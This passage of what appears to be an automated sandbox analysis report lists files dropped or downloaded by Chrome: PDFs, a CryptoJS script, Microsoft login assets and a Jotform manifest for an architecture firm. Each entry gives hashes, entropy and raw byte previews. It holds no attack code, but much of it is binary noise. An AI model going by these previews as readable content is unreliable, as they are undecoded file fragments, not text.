                                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.......0\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*Zrd....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Zzd....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*Zzd....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*Zzd...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z|d...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):146238
                                                                                                                                                                                                                                            Entropy (8bit):7.95809560989995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:H8tCig7NFh9nu/eMAvAq5K37BRV5aJMIsk4y+VS1/lS/b2WNxy/NG6dXHnE:H8tbCNFhFAq5KrTrLI1b6m9S/b2WN0/o
                                                                                                                                                                                                                                            MD5:101970D9D8BCD64F29FC00572E3C1DF3
                                                                                                                                                                                                                                            SHA1:9CFD771CA6FFCF8BC5A04524BE37A227DD5CB3A2
                                                                                                                                                                                                                                            SHA-256:1C337234A0FBF9A0B6DD3D0BCD7C714A1B7D8D48C5EBD030569EA11303A7C91A
                                                                                                                                                                                                                                            SHA-512:66DF4E307BB7B7355AC8C81D9E57F65EFB4589A62936081DEF32501650584D62CD0F04818503A2A0708F8EA986D78000C632D2A3082E611D3FCE0E15B8CFBE56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 3219 >>.stream.x..ZY..9.~._!{.z.....n...<..........1.`{..|yI...c ..NU..T*.L.'.....}..._..._>.)...{r9..#....9.G.^.w.._...2t.....%.a....zZ>.."P.C\...Q.=H..=....G....'...~.}rSv.sip~q.?......M.}..P9a/.1.....`...,yg....p.O...C.2.._........_.KS.a...u.'..p.`..;w.b..?.?. ...6..c..../.. I..khr..O.X......n.....<..#...{.M@..n\.^...|...~.....>.$..#MS....A7..I..W........+<....<..u.s.?../.K.....P..=....`...v.^.3..3. r....J.^.....#.:..-...&h.S?-...3..v8wp.?..}.|...7q.r|Y.>....s+..H.....+Z1....L..1......... .Va...>.S..0..W..A...t}....G...'.2x.w..k..w.<.3.....~..Qu{..&E..I..9. .z.z.s...#...&-.wE...o2....... ....qtb9.J....M.aC. .78.....)'Q...=+..r..O^r......GT8.h.3...ls.8.J...F..H.n).....^<...r.n...].............Fh(..q...7y.9d&.c?Q.8=!.2HA..H]b..!WQ...k.......B..h3y.....W.O1Q..m5.o.M.QV...M.?...X...(lR>p-#...`.4.9.... .8/.e...W...O..o9x+..Lr.Jr...L.[.6.]..O.....)M..2.$\.e.t..-....~...0..48..B.6.@H.h...H
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):146238
                                                                                                                                                                                                                                            Entropy (8bit):7.95809560989995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:H8tCig7NFh9nu/eMAvAq5K37BRV5aJMIsk4y+VS1/lS/b2WNxy/NG6dXHnE:H8tbCNFhFAq5KrTrLI1b6m9S/b2WN0/o
                                                                                                                                                                                                                                            MD5:101970D9D8BCD64F29FC00572E3C1DF3
                                                                                                                                                                                                                                            SHA1:9CFD771CA6FFCF8BC5A04524BE37A227DD5CB3A2
                                                                                                                                                                                                                                            SHA-256:1C337234A0FBF9A0B6DD3D0BCD7C714A1B7D8D48C5EBD030569EA11303A7C91A
                                                                                                                                                                                                                                            SHA-512:66DF4E307BB7B7355AC8C81D9E57F65EFB4589A62936081DEF32501650584D62CD0F04818503A2A0708F8EA986D78000C632D2A3082E611D3FCE0E15B8CFBE56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 3219 >>.stream.x..ZY..9.~._!{.z.....n...<..........1.`{..|yI...c ..NU..T*.L.'.....}..._..._>.)...{r9..#....9.G.^.w.._...2t.....%.a....zZ>.."P.C\...Q.=H..=....G....'...~.}rSv.sip~q.?......M.}..P9a/.1.....`...,yg....p.O...C.2.._........_.KS.a...u.'..p.`..;w.b..?.?. ...6..c..../.. I..khr..O.X......n.....<..#...{.M@..n\.^...|...~.....>.$..#MS....A7..I..W........+<....<..u.s.?../.K.....P..=....`...v.^.3..3. r....J.^.....#.:..-...&h.S?-...3..v8wp.?..}.|...7q.r|Y.>....s+..H.....+Z1....L..1......... .Va...>.S..0..W..A...t}....G...'.2x.w..k..w.<.3.....~..Qu{..&E..I..9. .z.z.s...#...&-.wE...o2....... ....qtb9.J....M.aC. .78.....)'Q...=+..r..O^r......GT8.h.3...ls.8.J...F..H.n).....^<...r.n...].............Fh(..q...7y.9d&.c?Q.8=!.2HA..H]b..!WQ...k.......B..h3y.....W.O1Q..m5.o.M.QV...M.?...X...(lR>p-#...`.4.9.... .8/.e...W...O..o9x+..Lr.Jr...L.[.6.]..O.....)M..2.$\.e.t..-....~...0..48..B.6.@H.h...H
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):146238
                                                                                                                                                                                                                                            Entropy (8bit):7.95809560989995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:H8tCig7NFh9nu/eMAvAq5K37BRV5aJMIsk4y+VS1/lS/b2WNxy/NG6dXHnE:H8tbCNFhFAq5KrTrLI1b6m9S/b2WN0/o
                                                                                                                                                                                                                                            MD5:101970D9D8BCD64F29FC00572E3C1DF3
                                                                                                                                                                                                                                            SHA1:9CFD771CA6FFCF8BC5A04524BE37A227DD5CB3A2
                                                                                                                                                                                                                                            SHA-256:1C337234A0FBF9A0B6DD3D0BCD7C714A1B7D8D48C5EBD030569EA11303A7C91A
                                                                                                                                                                                                                                            SHA-512:66DF4E307BB7B7355AC8C81D9E57F65EFB4589A62936081DEF32501650584D62CD0F04818503A2A0708F8EA986D78000C632D2A3082E611D3FCE0E15B8CFBE56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 3219 >>.stream.x..ZY..9.~._!{.z.....n...<..........1.`{..|yI...c ..NU..T*.L.'.....}..._..._>.)...{r9..#....9.G.^.w.._...2t.....%.a....zZ>.."P.C\...Q.=H..=....G....'...~.}rSv.sip~q.?......M.}..P9a/.1.....`...,yg....p.O...C.2.._........_.KS.a...u.'..p.`..;w.b..?.?. ...6..c..../.. I..khr..O.X......n.....<..#...{.M@..n\.^...|...~.....>.$..#MS....A7..I..W........+<....<..u.s.?../.K.....P..=....`...v.^.3..3. r....J.^.....#.:..-...&h.S?-...3..v8wp.?..}.|...7q.r|Y.>....s+..H.....+Z1....L..1......... .Va...>.S..0..W..A...t}....G...'.2x.w..k..w.<.3.....~..Qu{..&E..I..9. .z.z.s...#...&-.wE...o2....... ....qtb9.J....M.aC. .78.....)'Q...=+..r..O^r......GT8.h.3...ls.8.J...F..H.n).....^<...r.n...].............Fh(..q...7y.9d&.c?Q.8=!.2HA..H]b..!WQ...k.......B..h3y.....W.O1Q..m5.o.M.QV...M.?...X...(lR>p-#...`.4.9.... .8/.e...W...O..o9x+..Lr.Jr...L.[.6.]..O.....)M..2.$\.e.t..-....~...0..48..B.6.@H.h...H
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PDF document, version 1.3
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13411
                                                                                                                                                                                                                                            Entropy (8bit):7.956081213642273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qcl2rkTRDRYEnCae9B+rQ1Vyaduf0vgaj+4nKKFzhdbiOQqkqSiJ/Qrncy:1lYkT4Ce9B2Qfy85oaXKKFzOOpYidQgy
                                                                                                                                                                                                                                            MD5:F7AD3CD587258FF352850BEEDED32AC4
                                                                                                                                                                                                                                            SHA1:3445ABE992A0F3A16F631E311E1071430C1CC2B2
                                                                                                                                                                                                                                            SHA-256:7BB570A13FA8D312036D59CFC05058E88B9BAAA3F8671B61ECEF33239CD05339
                                                                                                                                                                                                                                            SHA-512:96A66AAC1320E5A975C8114C49D1DD2CD2439DC5578D0784E160BF0B090CABA09D44E231B85743731A1AB54ADAABDB56F19E7FCED5403525E0978824BEC0D0A5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 3219 >>.stream.x..ZY..9.~._!{.z.....n...<..........1.`{..|yI...c ..NU..T*.L.'.....}..._..._>.)...{r9..#....9.G.^.w.._...2t.....%.a....zZ>.."P.C\...Q.=H..=....G....'...~.}rSv.sip~q.?......M.}..P9a/.1.....`...,yg....p.O...C.2.._........_.KS.a...u.'..p.`..;w.b..?.?. ...6..c..../.. I..khr..O.X......n.....<..#...{.M@..n\.^...|...~.....>.$..#MS....A7..I..W........+<....<..u.s.?../.K.....P..=....`...v.^.3..3. r....J.^.....#.:..-...&h.S?-...3..v8wp.?..}.|...7q.r|Y.>....s+..H.....+Z1....L..1......... .Va...>.S..0..W..A...t}....G...'.2x.w..k..w.<.3.....~..Qu{..&E..I..9. .z.z.s...#...&-.wE...o2....... ....qtb9.J....M.aC. .78.....)'Q...=+..r..O^r......GT8.h.3...ls.8.J...F..H.n).....^<...r.n...].............Fh(..q...7y.9d&.c?Q.8=!.2HA..H]b..!WQ...k.......B..h3y.....W.O1Q..m5.o.M.QV...M.?...X...(lR>p-#...`.4.9.... .8/.e...W...O..o9x+..Lr.Jr...L.[.6.]..O.....)M..2.$\.e.t..-....~...0..48..B.6.@H.h...H
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48316
                                                                                                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1435
                                                                                                                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6
                                                                                                                                                                                                                                            Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:fCu:au
                                                                                                                                                                                                                                            MD5:AAAB7A355103063D9EEB4824A3A6B374
                                                                                                                                                                                                                                            SHA1:E51555F02C32321F3E48F07A0FA5AF46DF835BFC
                                                                                                                                                                                                                                            SHA-256:79BA862622D6FA84AC7E4F98EB95043A255FC2C81711E9400A8AA4D4B1608471
                                                                                                                                                                                                                                            SHA-512:D1A0C9C4F628459F5CA904405B2A66A69425A50E8DCE1BAA43161D784EB219BD3E1FD9447BCBACC314652EDA08CF0B02C863C87F3AC1534AE0F62A414C191F1B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:dfp:OK
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):61052
                                                                                                                                                                                                                                            Entropy (8bit):7.996159932827634
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                                                                                                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                                                                                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                                                                                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                                                                                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                                                                                                                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (2631), with CRLF line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):2752
                                                                                                                                                                                                                                            Entropy (8bit):5.656856851454464
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:t1XXw+kOhX/BxVgnK/Q6GiuGq9juwbae13NhcKBLd4HMPhOr0YU45tz6IIQoNfk:H9W3iuV96wDrHBZ4sAoYrbfn/
                                                                                                                                                                                                                                            MD5:00B5E86A299EDD1C02CB97663A8D196C
                                                                                                                                                                                                                                            SHA1:3E587F34EFB2E96A9B2F9A5513989B3E81FD5410
                                                                                                                                                                                                                                            SHA-256:D443E6A9104E09A16EDDBA10F7CC9A7340A31E98CA424D81AA53650D13E7207C
                                                                                                                                                                                                                                            SHA-512:F828FE5B92D991305B5DF96CD7A50619FA5D3789EA551A2E589F74200589912CE23883DAF1AB3F8E15B818804AC85E0EB3DECE7C4EADE6B37C3710FD70AFE40B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&session_id=0a66f3c0384e4d088350ad68ffaa2658&id=cd121334-9fb4-0cca-cd77-e4c2b3b2287d&w=8DD31739015C396&tkt=taBcrIH61PuCVH7eNCyH0FC0izOzUpX5wN2Z%252b5egc%252f6d%252bhsbGHwHEBPJsy7XqLD8rXhULapxY174A31dN8WtQ5i2YpCRe3HaBsZ1rV9gU3RSjA%252bnlxgHY197%252bWh1l3OdM2GeqesWZqI3T7Gozf1nmux4HNR5cEIzS7JsNzXy1ykmBYMfDdLMZwT7UOysU6kIvvXn9Ub7plIgJ6TqaEoXo60YuZK7%252fZDE%252bbTCCWRDG2D4hpDgdjmr3gTJEQc5d5PtD%252bgOylqLupX6v2QwwEOA4lUf68bmo011MayB%252bFY0y8LKMQ5RL%252b25a8glz5df%252fvhn&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d
                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>..</head>..<script>function BaseStamp() { this.GetStorageQsInfo = function () { if (window.localStorage) { var n = window.localStorage.getItem(lsKey); var lsupd = "False"; if (lsupd === "true" && n) { var xhr = new XMLHttpRequest(), method = "GET", url = target + "updatels.html?ofid=" + n + "&session_id=" + sid + "&CustomerId=" + cid; xhr.open(method, url, true); xhr.onreadystatechange = function () { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { var update = xhr.responseText; if (update && update.toLowerCase() === "true") { window.localStorage.setItem(lsKey, id); } } }; xhr.send(); } if (n && n != null && n != "" || (window.localStorage.setItem(lsKey, id), n = id), id != n) return "session_id=" + sid + "&CustomerId=" + cid + "&fid=" + id + "&ofid=" + n + "&w=" + ticks + "&auth=" + encodeURIComponent(authKey) } return "" }; this.newXMLHttp = function () { var n = null; return
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1899
                                                                                                                                                                                                                                            Entropy (8bit):5.335242648209657
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:YM9fdAIAvw1FAIAvEFAIAvyFAIAvsFAIAvB8sgFAIAvOJFAIAviI/t556bP:nfaMSsS6SUSLgSGJSKI/9EP
                                                                                                                                                                                                                                            MD5:B4EA4DC02EB5ACC676964AD501AFBE3E
                                                                                                                                                                                                                                            SHA1:13ABC1EDB14DC1A7AEDAE9424696B5DB6016AF7B
                                                                                                                                                                                                                                            SHA-256:C880F2584DBA00D1E4A356517C218CF8DE164C2BB3524B2F9C065194F0D20E21
                                                                                                                                                                                                                                            SHA-512:ABCBA9481B28DB5C39AE7E4FD1072ABA0626695369B5EC090619469EF9E016154A4346F0B43AF7AA850DE739426907CCBF682EF4F6BC1B5C7215F355E569822D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu.jotform.com/app/250092704521347/manifest.json
                                                                                                                                                                                                                                            Preview:{"name":"Gittens Murray Architects Ltd","short_name":"Gittens Murray Architects Ltd","description":"Scanned From : MPD609\n","scope":"\/app\/250092704521347","start_url":"\/app\/250092704521347?utm_source=jotform_pwa","display":"standalone","theme_color":"#ffffff","background_color":"#0A1551","icons":[{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=16&height=16&time=1736507717","sizes":"16x16","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=32&height=32&time=1736507717","sizes":"32x32","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=48&height=48&time=1736507717","sizes":"48x48","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=128&
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1435
                                                                                                                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
                                                                                                                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 144 x 144, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                                                                                            Entropy (8bit):7.503764964979933
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OAKiHZ33W0XrzLdu6m5hRR+PFVIqngrKfAGrvPG8bn1/07kPBcSTr3ehWHJ:mmjdu6mdR+X/ngrKfjG8pCmXusp
                                                                                                                                                                                                                                            MD5:88BCF8B9693D101ED0F51D5FCBED4690
                                                                                                                                                                                                                                            SHA1:53A2221A74D176C20D6EF19FFB221880733331CB
                                                                                                                                                                                                                                            SHA-256:F4AC53890B1FC6B17DBF9495C150F606461549C1B130FD7D27198A790B09134F
                                                                                                                                                                                                                                            SHA-512:83295B3705AA56EEDEC1B871AB485855C387958BC65AA59180DAB3CD3380854236F11674F57D124CCE92A4AACF7394EF81596A94E45AF85705EEA74BD2F934B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-light.png
